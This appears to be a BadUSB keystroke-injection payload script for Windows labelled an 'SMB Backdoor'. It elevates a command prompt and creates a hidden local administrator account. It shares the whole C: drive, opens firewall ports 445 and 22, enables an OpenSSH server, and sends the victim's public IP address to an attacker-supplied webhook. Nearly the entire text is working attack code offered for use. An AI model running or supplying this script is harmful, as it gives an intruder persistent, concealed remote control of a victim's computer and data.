REM # Title:            "Microsoft Windows" SMB Backdoor
REM # Description:      
REM #                   1) Adds a user account (ADMIN2:ADMIN2_PASS).
REM #                   2) Adds this local user to the local administrator group.
REM #                   3) Shares "C:" directory (RD_SHARE).
REM #                   4) Adds a rule to the firewall.
REM #                   5) Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account.
REM #                   6) Hides this user account.
REM #
REM # Author:           TW-D
REM # Editor:           Eclipse
REM # Version:          1.2
REM # Category:         Remote Access
REM # Target:           Microsoft Windows
REM #
REM # TESTED ON
REM # ===============
REM # Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
REM # Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
REM # Microsoft Windows 10 (tiny 10)
REM #
REM # REQUIREMENTS
REM # ===============
REM # The target user must belong to the 'Administrators' group.
REM #

REM ######## INITIALIZATION ########

DELAY 500

REM ######## STAGE1 ########

GUI r
DELAY 3000
STRING cmd
DELAY 300
CTRL SHIFT ENTER
DELAY 300
TAB
DELAY 100
LEFTARROW
DELAY 100
LEFTARROW
DELAY 100
ENTER
DELAY 500

REM ######## STAGE2 ########

STRING NET USER ADMIN2 ADMIN2_PASS /ADD
ENTER
DELAY 1500

STRING NET LOCALGROUP Administrators ADMIN2 /ADD
ENTER
DELAY 300

REM ######## STAGE3 ########

STRING NET SHARE RD_SHARE=C:\ /GRANT:ADMIN2,FULL /REMARK:"RRemote DShare"
ENTER
DELAY 300

STRING NETSH ADVFIREWALL FIREWALL ADD RULE NAME="Server Message Block for RD" PROTOCOL=TCP LOCALPORT=445 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN
ENTER
DELAY 300

REM ######## STAGE4 ########

STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
ENTER
DELAY 300

STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v ADMIN2 /t REG_DWORD /d 0
ENTER
DELAY 300

REM ######## FINISH ########

STRING EXIT
ENTER

GUI r
DELAY 200
STRING powershell -windowstyle hidden
DELAY 200
CTRL SHIFT ENTER
DELAY 100
GUI TAB
DELAY 300
LEFTARROW
DELAY 100
ENTER
DELAY 300
STRING Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0
DELAY 250
ENTER
STRING Start-Service sshd
DELAY 175
ENTER
STRING Set-Service -Name sshd -StartupType 'Automatic'
DELAY 200
ENTER
STRING New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled true -Protocol TCP -Action Allow -LocalPort 22
DELAY 400
ENTER
STRING $webhook = "YOUR_WEBHOOK_HERE"; 
STRING $output = Invoke-RestMethod -Uri "https://api.ipify.org?format=json" -Method Get | ConvertTo-Json -Depth 10; 
STRING Invoke-RestMethod -Uri $webhook -Method Post -Body (@{content=$output} | ConvertTo-Json -Depth 10) -ContentType "application/json"
DELAY 425
ENTER
STRING exit
ENTER